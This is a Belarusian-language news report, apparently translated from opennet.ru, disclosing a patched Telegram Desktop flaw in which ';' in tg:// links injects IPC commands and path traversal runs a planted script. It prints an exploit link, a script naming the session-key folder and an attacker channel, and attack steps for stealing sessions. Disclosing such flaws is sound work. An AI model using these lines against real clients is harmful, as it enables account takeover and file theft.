Уразлівасць у Telegram Desktop, якая дазваляе адправіць адвольныя файлы пры кліку на спасылку

Раскрытыя падрабязнасці і метад эксплуатацыі ўразлівасці (CVE-2026-107181) у Telegram Desktop, афіцыйным кліенце Telegram для настольных сістэм. Праблема выклікана адсутнасцю належнай апрацоўкі неэкранаваных сімвалаў-падзельнікаў у камандах IPC, што дазваляла пры зграі на адпраўленую спасылку арганізаваць перадачу атакаваламу любых файлаў з сістэмы ахвяры, уключаючы файлы з сесійнымі ключамі, якія можна выкарыстоўваць для захопу ўліковага запісу ў Telegram. Уразлівасць ухіленая ў выпуску Telegram Desktop 7.2.9.

Пры кліку на спасылках "tg://" аперацыйная сістэма запускае звязанае з дадзеным тыпам спасылак прыкладанне Telegram Desktop. Калі ў сістэме ўжо запушчаны іншы асобнік дадзенага прыкладання, то запушчаны працэс перадае яму спасылку праз сокет пры дапамозе IPC-інтэрфейсу. Праблема ў тым, што калі пазначыць сімвал «;» сярод параметраў спасылкі (напрыклад, "tg://x?a=1;OPEN…"), змесціва падзяляецца і ідучыя пасля знака ";" часткі апрацоўваюцца як асобныя каманды.

Для здзяйснення нападу задзейнічана каманда OPEN разам з URI-схемай "interpret:", прызначанай для запуску службовых сцэнараў праз IPC, якія выкарыстоўваліся для аўтаматычнай адпраўкі новых рэлізаў у каналы. Сцэнар уяўляе сабой перадвызначаны лакальны файл, у якім паказаны які адпраўляецца ў канал файл і ідэнтыфікатар канала. Файлавы шлях да сцэнароў апрацоўваецца адносна службовага падкаталога, але з-за адсутнасці чысткі "../" у файлавых шляхах атакавалы мае магчымасць звярнуцца да файлаў, захаваным за межамі базавага каталога. Напрыклад, можна загрузіць файл у сваю telegram-групу, пасля чаго спаслацца на гэты файл як на сцэнар, падрыхтаваўшы спасылку тыпу:

tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt

Этапы правядзення нападу:

  • Атакуючы дадае ахвяру ў сваю групу (пры наладах па змаўчанні даданне не патрабуе пацверджання ад дадаванага) і адпраўляе ў гэтую групу тэкставы файл, у якім паказаны канал і шлях да сцэнара. Telegram захавае гэты файл у наканаваны сістэмны падкаталог пры заходзе ахвяры ў групу.

    channel: 2005234537
    file: tdata/D877F783D5D3EF8Cs

  • Атакуючы дасылае ахвяры нявінна якая выглядае спасылку на свой хост (напрыклад, "https://coolsite.org"), якая пры адкрыцці праз перанакіраванне на серверы атакавалага замяняецца на URI выгляду 'tg://x?a=1;OPEN:interpret:…;OPEN:interpret:….
  • Пры кліку па спасылцы браўзэр выклікае апрацоўшчык URI "tg://", які запускае вышэйадзначаны ланцужок запуску каманд, якая прыводзіць да адпраўкі файлаў да канал атакавалага без высновы якія-небудзь апавяшчэнняў і без запыту пацверджання адпраўкі.
  • Атрымаўшы файлы з падкаталога tdata c ключамі шыфравання і аўтарызацыі, пры адсутнасці выстаўленага карыстачом лакальнага пароля атакавалы можа кланаваць сеанс падлучэння ахвяры на сваёй прыладзе.

Крыніца: opennet.ru

Купіць надзейны хостынг для сайтаў з абаронай ад DDoS, VPS VDS серверы 🔥 Купіць надзейны хостынг для сайтаў з абаронай ад DDoS, VPS VDS серверы | ProHoster